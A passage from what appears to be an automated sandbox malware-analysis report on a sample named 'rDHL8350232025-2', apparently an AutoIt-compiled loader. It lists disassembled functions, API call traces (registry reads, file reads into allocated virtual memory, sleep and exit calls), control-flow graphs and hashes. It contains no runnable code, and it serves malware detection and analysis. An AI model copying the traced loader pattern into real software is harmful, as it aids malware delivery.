                                                                                      • Instruction Fuzzy Hash: 34421370608341EFE73ADF24D884FAAB7E9FF46300F14455AE49687292D774E884CB82
                                                                                      Function 0003344D Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 201registryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 00033A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00101418,?,00032E7F,?,?,?,00000000), ref: 00033A78
                                                                                        • Part of subcall function 00033357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00033379
                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0003356A
                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0007318D
                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 000731CE
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00073210
                                                                                      • _wcslen.LIBCMT ref: 00073277
                                                                                      • _wcslen.LIBCMT ref: 00073286
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\$]
                                                                                      • API String ID: 98802146-2783988525
                                                                                      • Opcode ID: b0f3e9f5588cd281a6969adf75de139902f666f6bd01012f83af83a73019eb72
                                                                                      • Instruction ID: ce9a0307795971130691f30337513ce75d2081fc503c0219f6739acdb91eba59
                                                                                      • Opcode Fuzzy Hash: b0f3e9f5588cd281a6969adf75de139902f666f6bd01012f83af83a73019eb72
                                                                                      • Instruction Fuzzy Hash: 4071D4715043019ED305EF65DC85DAFB7E8FF89340F40482EF5899B1A2EBB49A88CB52
                                                                                      Function 00032CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00032D07
                                                                                      • RegisterClassExW.USER32(00000030), ref: 00032D31
                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00032D42
                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00032D5F
                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00032D6F
                                                                                      • LoadIconW.USER32(000000A9), ref: 00032D85
                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00032D94
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                      • API String ID: 2914291525-1005189915
                                                                                      • Opcode ID: 0df3783e2a1b2293c22f4158df71090d130e662a22a76c63718acfcbd84053c1
                                                                                      • Instruction ID: 4bf72cf3bf39901996169f965aa2a792f9927ed7d1f95d6b22e89c4d6d0f5753
                                                                                      • Opcode Fuzzy Hash: 0df3783e2a1b2293c22f4158df71090d130e662a22a76c63718acfcbd84053c1
                                                                                      • Instruction Fuzzy Hash: 6C21EFB1D01308AFEB00DFA4E889F9DBBB4FB08704F10811AF655AA6A0D7B90580CF91
                                                                                      Function 0007065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 372 7065b-7068b call 7042f 375 706a6-706b2 call 65221 372->375 376 7068d-70698 call 5f2c6 372->376 382 706b4-706c9 call 5f2c6 call 5f2d9 375->382 383 706cb-70714 call 7039a 375->383 381 7069a-706a1 call 5f2d9 376->381 393 7097d-70983 381->393 382->381 391 70716-7071f 383->391 392 70781-7078a GetFileType 383->392 397 70756-7077c GetLastError call 5f2a3 391->397 398 70721-70725 391->398 394 707d3-707d6 392->394 395 7078c-707bd GetLastError call 5f2a3 CloseHandle 392->395 400 707df-707e5 394->400 401 707d8-707dd 394->401 395->381 409 707c3-707ce call 5f2d9 395->409 397->381 398->397 402 70727-70754 call 7039a 398->402 405 707e9-70837 call 6516a 400->405 406 707e7 400->406 401->405 402->392 402->397 415 70847-7086b call 7014d 405->415 416 70839-70845 call 705ab 405->416 406->405 409->381 422 7087e-708c1 415->422 423 7086d 415->423 416->415 421 7086f-70879 call 686ae 416->421 421->393 425 708c3-708c7 422->425 426 708e2-708f0 422->426 423->421 425->426 428 708c9-708dd 425->428 429 708f6-708fa 426->429 430 7097b 426->430 428->426 429->430 431 708fc-7092f CloseHandle call 7039a 429->431 430->393 434 70963-70977 431->434 435 70931-7095d GetLastError call 5f2a3 call 65333 431->435 434->430 435->434
                                                                                      APIs
                                                                                        • Part of subcall function 0007039A: CreateFileW.KERNELBASE(00000000,00000000,?,00070704,?,?,00000000,?,00070704,00000000,0000000C), ref: 000703B7
                                                                                      • GetLastError.KERNEL32 ref: 0007076F
                                                                                      • __dosmaperr.LIBCMT ref: 00070776
                                                                                      • GetFileType.KERNELBASE(00000000), ref: 00070782
                                                                                      • GetLastError.KERNEL32 ref: 0007078C
                                                                                      • __dosmaperr.LIBCMT ref: 00070795
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000707B5
                                                                                      • CloseHandle.KERNEL32(?), ref: 000708FF
                                                                                      • GetLastError.KERNEL32 ref: 00070931
                                                                                      • __dosmaperr.LIBCMT ref: 00070938
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                      • String ID: H
                                                                                      • API String ID: 4237864984-2852464175
                                                                                      • Opcode ID: 9b7b801186cf6d730534640c23318333462c1404042e55be7e6722558444fbda
                                                                                      • Instruction ID: fa726f59b53b6d2206048bbe8ad249dcafc65ce9e29808d9753e5efb6f17c705
                                                                                      • Opcode Fuzzy Hash: 9b7b801186cf6d730534640c23318333462c1404042e55be7e6722558444fbda
                                                                                      • Instruction Fuzzy Hash: FCA13632E14145CFDF19AF68DC51BAE3BE0AB06320F14825DF8599B392CB399D12CB95
                                                                                      Function 00032B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00032B8E
                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00032B9D
                                                                                      • LoadIconW.USER32(00000063), ref: 00032BB3
                                                                                      • LoadIconW.USER32(000000A4), ref: 00032BC5
                                                                                      • LoadIconW.USER32(000000A2), ref: 00032BD7
                                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00032BEF
                                                                                      • RegisterClassExW.USER32(?), ref: 00032C40
                                                                                        • Part of subcall function 00032CD4: GetSysColorBrush.USER32(0000000F), ref: 00032D07
                                                                                        • Part of subcall function 00032CD4: RegisterClassExW.USER32(00000030), ref: 00032D31
                                                                                        • Part of subcall function 00032CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00032D42
                                                                                        • Part of subcall function 00032CD4: InitCommonControlsEx.COMCTL32(?), ref: 00032D5F
                                                                                        • Part of subcall function 00032CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00032D6F
                                                                                        • Part of subcall function 00032CD4: LoadIconW.USER32(000000A9), ref: 00032D85
                                                                                        • Part of subcall function 00032CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00032D94
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                      • String ID: #$0$AutoIt v3
                                                                                      • API String ID: 423443420-4155596026
                                                                                      • Opcode ID: 03e5510eb6c2ab133b740f23610c8b17c7556e3263f66d1543759a03a4e249da
                                                                                      • Instruction ID: bb108381398789bc5f55446103ec3de5fbed9f83fab81ddc65a00a6f0bd037f6
                                                                                      • Opcode Fuzzy Hash: 03e5510eb6c2ab133b740f23610c8b17c7556e3263f66d1543759a03a4e249da
                                                                                      • Instruction Fuzzy Hash: D9211A70E10314BBEB109FA5EC59EA97FF4FB48B60F04011AF544AAAA0D7F94580DF90
                                                                                      Function 00033170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 443 33170-33185 444 33187-3318a 443->444 445 331e5-331e7 443->445 447 331eb 444->447 448 3318c-33193 444->448 445->444 446 331e9 445->446 449 331d0-331d8 DefWindowProcW 446->449 450 331f1-331f6 447->450 451 72dfb-72e23 call 318e2 call 4e499 447->451 452 33265-3326d PostQuitMessage 448->452 453 33199-3319e 448->453 454 331de-331e4 449->454 456 331f8-331fb 450->456 457 3321d-33244 SetTimer RegisterWindowMessageW 450->457 489 72e28-72e2f 451->489 455 33219-3321b 452->455 459 331a4-331a8 453->459 460 72e7c-72e90 call 9bf30 453->460 455->454 461 33201-33214 KillTimer call 330f2 call 33c50 456->461 462 72d9c-72d9f 456->462 457->455 464 33246-33251 CreatePopupMenu 457->464 465 331ae-331b3 459->465 466 72e68-72e77 call 9c161 459->466 460->455 484 72e96 460->484 461->455 468 72dd7-72df6 MoveWindow 462->468 469 72da1-72da5 462->469 464->455 473 72e4d-72e54 465->473 474 331b9-331be 465->474 466->455 468->455 476 72da7-72daa 469->476 477 72dc6-72dd2 SetFocus 469->477 473->449 478 72e5a-72e63 call 90ad7 473->478 482 33253-33263 call 3326f 474->482 483 331c4-331ca 474->483 476->483 485 72db0-72dc1 call 318e2 476->485 477->455 478->449 482->455 483->449 483->489 484->449 485->455 489->449 490 72e35-72e48 call 330f2 call 33837 489->490 490->449
                                                                                      APIs
                                                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0003316A,?,?), ref: 000331D8
                                                                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,0003316A,?,?), ref: 00033204
                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00033227
                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0003316A,?,?), ref: 00033232
                                                                                      • CreatePopupMenu.USER32 ref: 00033246
                                                                                      • PostQuitMessage.USER32(00000000), ref: 00033267
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                      • String ID: TaskbarCreated
                                                                                      • API String ID: 129472671-2362178303
                                                                                      • Opcode ID: 83b9cfc4e039b1c6e94e70ff9ac0e468b4cccbbe290988c0f1ea91866748836a
                                                                                      • Instruction ID: db750c1197e4bf579c0d9d6f71e4ec79259d06a7072dcb1c3a4ded07151caa17
                                                                                      • Opcode Fuzzy Hash: 83b9cfc4e039b1c6e94e70ff9ac0e468b4cccbbe290988c0f1ea91866748836a
                                                                                      • Instruction Fuzzy Hash: 3C417B31604200BBEB361B78DD8DFBE3A9DF705314F044125F94A9A5E2CBBC8E8097A5
                                                                                      Function 0117AF30 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 499 117af30-117afde call 1178940 502 117afe5-117b00b call 117be40 CreateFileW 499->502 505 117b012-117b022 502->505 506 117b00d 502->506 511 117b024 505->511 512 117b029-117b043 VirtualAlloc 505->512 507 117b15d-117b161 506->507 509 117b1a3-117b1a6 507->509 510 117b163-117b167 507->510 513 117b1a9-117b1b0 509->513 514 117b173-117b177 510->514 515 117b169-117b16c 510->515 511->507 516 117b045 512->516 517 117b04a-117b061 ReadFile 512->517 518 117b205-117b21a 513->518 519 117b1b2-117b1bd 513->519 520 117b187-117b18b 514->520 521 117b179-117b183 514->521 515->514 516->507 526 117b063 517->526 527 117b068-117b0a8 VirtualAlloc 517->527 522 117b21c-117b227 VirtualFree 518->522 523 117b22a-117b232 518->523 528 117b1c1-117b1cd 519->528 529 117b1bf 519->529 524 117b18d-117b197 520->524 525 117b19b 520->525 521->520 522->523 524->525 525->509 526->507 530 117b0af-117b0ca call 117c090 527->530 531 117b0aa 527->531 532 117b1e1-117b1ed 528->532 533 117b1cf-117b1df 528->533 529->518 539 117b0d5-117b0df 530->539 531->507 536 117b1ef-117b1f8 532->536 537 117b1fa-117b200 532->537 535 117b203 533->535 535->513 536->535 537->535 540 117b112-117b126 call 117bea0 539->540 541 117b0e1-117b110 call 117c090 539->541 547 117b12a-117b12e 540->547 548 117b128 540->548 541->539 549 117b130-117b134 CloseHandle 547->549 550 117b13a-117b13e 547->550 548->507 549->550 551 117b140-117b14b VirtualFree 550->551 552 117b14e-117b157 550->552 551->552 552->502 552->507
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0117B001
                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0117B227
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2013725756.0000000001178000.00000040.00000020.00020000.00000000.sdmp, Offset: 01178000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1178000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFileFreeVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 204039940-0
                                                                                      • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                      • Instruction ID: df6245a5323279507b6c158a50f34ff5f7cc52c6450d91f6151446b76ec1f4bb
                                                                                      • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                      • Instruction Fuzzy Hash: 63A11874E04209EBDB18CFA4D894BEEBBB5FF48304F208559E211BB380D7759A81CB95
                                                                                      Function 000310F3 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 153comCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00031BF4
                                                                                        • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00031BFC
                                                                                        • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00031C07
                                                                                        • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00031C12
                                                                                        • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00031C1A
                                                                                        • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00031C22
                                                                                        • Part of subcall function 00031B4A: RegisterWindowMessageW.USER32(00000004,?,000312C4), ref: 00031BA2
                                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0003136A
                                                                                      • OleInitialize.OLE32 ref: 00031388
                                                                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 000724AB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                      • String ID: $0i$`
                                                                                      • API String ID: 1986988660-1920216020
                                                                                      • Opcode ID: fd85bd33c1df2d9d0f213b40928aad9b2963d226eda421b493c45578a1e4aca2
                                                                                      • Instruction ID: adebd1933317dabbf69f7c1e73af58d23cb3b17d076f0fa0e7f4a99294e1ac8b
                                                                                      • Opcode Fuzzy Hash: fd85bd33c1df2d9d0f213b40928aad9b2963d226eda421b493c45578a1e4aca2
                                                                                      • Instruction Fuzzy Hash: CA71A2B4901200AFD385DF79ED45A953AE5FB8A340754812EE0CADBAB2EBFC4581CF41
                                                                                      Function 00032C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 606 32c63-32cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                      APIs
                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00032C91
                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00032CB2
                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00031CAD,?), ref: 00032CC6
                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00031CAD,?), ref: 00032CCF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CreateShow
                                                                                      • String ID: AutoIt v3$edit
                                                                                      • API String ID: 1584632944-3779509399
                                                                                      • Opcode ID: 78c5d2abaf06eaf68bb65a583cfa2785917e04fcd31451cca0bc2177e9b5d0fd
                                                                                      • Instruction ID: 6845dfbea31787348dc91c0bdc516c72a14f93ceb97e91f6744dcaeced51df53
                                                                                      • Opcode Fuzzy Hash: 78c5d2abaf06eaf68bb65a583cfa2785917e04fcd31451cca0bc2177e9b5d0fd
                                                                                      • Instruction Fuzzy Hash: F4F0DA755403907AFB311717AC0CE773EBDE7C6F60B00105EF944AA9A0C6B91891DAB0
                                                                                      Function 0117ACF0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 721 117acf0-117ae24 call 1178940 call 117abe0 CreateFileW 728 117ae26 721->728 729 117ae2b-117ae3b 721->729 730 117aedb-117aee0 728->730 732 117ae42-117ae5c VirtualAlloc 729->732 733 117ae3d 729->733 734 117ae60-117ae77 ReadFile 732->734 735 117ae5e 732->735 733->730 736 117ae7b-117aeb5 call 117ac20 call 1179be0 734->736 737 117ae79 734->737 735->730 742 117aeb7-117aecc call 117ac70 736->742 743 117aed1-117aed9 ExitProcess 736->743 737->730 742->743 743->730
                                                                                      APIs
                                                                                        • Part of subcall function 0117ABE0: Sleep.KERNELBASE(000001F4), ref: 0117ABF1
                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0117AE1A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2013725756.0000000001178000.00000040.00000020.00020000.00000000.sdmp, Offset: 01178000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1178000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFileSleep
                                                                                      • String ID: 30EX1A2834LH8IHN9E32II6H4
                                                                                      • API String ID: 2694422964-3492477750
                                                                                      • Opcode ID: 650a75e4d60e5522dfaa048c4c2bca06e46b035afced6525dff720bb5ea395cc
                                                                                      • Instruction ID: 7b641319c1d30517a0b1c08c6d4de0d794eee0a80d5526fdca845d8cc5815347
                                                                                      • Opcode Fuzzy Hash: 650a75e4d60e5522dfaa048c4c2bca06e46b035afced6525dff720bb5ea395cc
                                                                                      • Instruction Fuzzy Hash: 1A51B630D04298DAEF16D7F8D814BEEBB78AF15304F044599E2447B2C1CBB90B49CBA5
                                                                                      Function 00033B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 781 33b1c-33b27 782 33b99-33b9b 781->782 783 33b29-33b2e 781->783 784 33b8c-33b8f 782->784 783->782 785 33b30-33b48 RegOpenKeyExW 783->785 785->782 786 33b4a-33b69 RegQueryValueExW 785->786 787 33b80-33b8b RegCloseKey 786->787 788 33b6b-33b76 786->788 787->784 789 33b90-33b97 788->789 790 33b78-33b7a 788->790 791 33b7e 789->791 790->791 791->787
                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00033B0F,SwapMouseButtons,00000004,?), ref: 00033B40
                                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00033B0F,SwapMouseButtons,00000004,?), ref: 00033B61
                                                                                      • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00033B0F,SwapMouseButtons,00000004,?), ref: 00033B83
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValue
                                                                                      • String ID: Control Panel\Mouse
                                                                                      • API String ID: 3677997916-824357125
                                                                                      • Opcode ID: 3f5404f8c4f530ba5e77353ebea98b95d2b9230cbaf638e4313cfb4b4b22c779
                                                                                      • Instruction ID: bb1aa22a2cd16c450adb9287a077885d5099cc7f7ab5b7ab6c21787d93d3e2bc
                                                                                      • Opcode Fuzzy Hash: 3f5404f8c4f530ba5e77353ebea98b95d2b9230cbaf638e4313cfb4b4b22c779
                                                                                      • Instruction Fuzzy Hash: AD112AB5510208FFEB618FA5DC84EAEB7BCEF44744F104459EA05D7110D3319E409760
                                                                                      Function 01179BE0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
